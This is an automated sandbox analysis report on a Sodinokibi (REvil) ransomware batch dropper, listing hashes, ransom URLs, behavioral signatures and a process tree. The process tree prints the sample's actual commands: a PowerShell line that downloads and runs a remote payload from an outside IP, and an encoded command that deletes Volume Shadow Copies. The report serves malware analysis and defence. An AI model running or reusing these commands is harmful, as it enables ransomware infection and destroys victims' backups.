Analysis
- max time kernel: 132s
- max time network: 54s
- platform: windows7_x64
- resource: win7v200430
- submitted: 15-05-2020 19:19
- Static task: static1
- Behavioral task: behavioral1 (sample d414776d8291887b69e7e08716350a94.bat, resource win7v200430)
- Behavioral task: behavioral2 (sample d414776d8291887b69e7e08716350a94.bat, resource win10v200430)
General
- Target: d414776d8291887b69e7e08716350a94.bat
- Size: 216B
- MD5: 44b1551634044bfd5c2101792984ab6a
- SHA1: c1c890dd032188b9c1488e5cf4ff4f22d88b74e5
- SHA256: d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4
- SHA512: faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677
Malware Config
- Extracted from: http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94
- Extracted from: C:\3uxah42q-readme.txt
  - Family: sodinokibi
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5B9A722923F5083
  - http://decryptor.cc/B5B9A722923F5083
Signatures

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
- Token: SeDebugPrivilege | 884 | powershell.exe
- Token: SeDebugPrivilege | 884 | powershell.exe
- Token: SeDebugPrivilege | 524 | powershell.exe
- Token: SeBackupPrivilege | 1676 | vssvc.exe
- Token: SeRestorePrivilege | 1676 | vssvc.exe
- Token: SeAuditPrivilege | 1676 | vssvc.exe
- Token: SeTakeOwnershipPrivilege | 884 | powershell.exe

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
- Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
- Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
- Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
- Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
description | ioc | process
- Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\73ml194.bmp" | powershell.exe

Drops file in Program Files directory (42 IoCs)
Processes: powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
pid | process
- 884 | powershell.exe

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
- PID 1440 wrote to memory of 884 | 1440 | cmd.exe | powershell.exe
- PID 884 wrote to memory of 524 | 884 | powershell.exe | powershell.exe
- PID 884 wrote to memory of 524 | 884 | powershell.exe | powershell.exe
- PID 884 wrote to memory of 524 | 884 | powershell.exe | powershell.exe
- PID 884 wrote to memory of 524 | 884 | powershell.exe | powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
- 884 | powershell.exe
- 884 | powershell.exe
- 884 | powershell.exe
- 524 | powershell.exe
- 524 | powershell.exe

Blacklisted process makes network request (1 IoCs)
Processes: powershell.exe
flow | pid | process
- 2 | 884 | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 1440)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 884)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"
    - Suspicious use of AdjustPrivilegeToken
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 524)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID 1676)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service